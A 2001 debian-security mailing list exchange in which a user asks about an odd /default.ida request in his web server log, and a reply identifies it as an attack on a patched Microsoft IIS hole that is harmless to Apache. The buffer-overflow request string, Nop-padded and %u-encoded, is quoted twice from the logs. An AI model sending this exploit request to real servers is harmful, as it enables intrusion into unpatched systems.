I'm sure that most of us have seen this by now in our logs: > xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 > 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 > 078%u0000%u00=a HTTP/1.0" 400 328
This is apparently an attack against a (patched) hole in Microsoft IIS, and doesn't have any impact other than a minor log annoyance on Apache users. ZDNet has a story regarding this: http://www.zdnet.com/zdnn/stories/news/0,4586,5094345,00.html?chkpt=zdhpnews 01 Josh > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Thursday, July 19, 2001 2:17 PM > To: debian-security@lists.debian.org > Subject: CGI Buffer Overflow? > > > Anyone seen this before? I have looked around for similar attacks, but > cannot find any info. I assume that is a unicode string padded out with > Ns. How would I go about finding out what is in the string? > > > xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 > 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 > 078%u0000%u00=a HTTP/1.0" 400 328 > > > --Brian > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > >
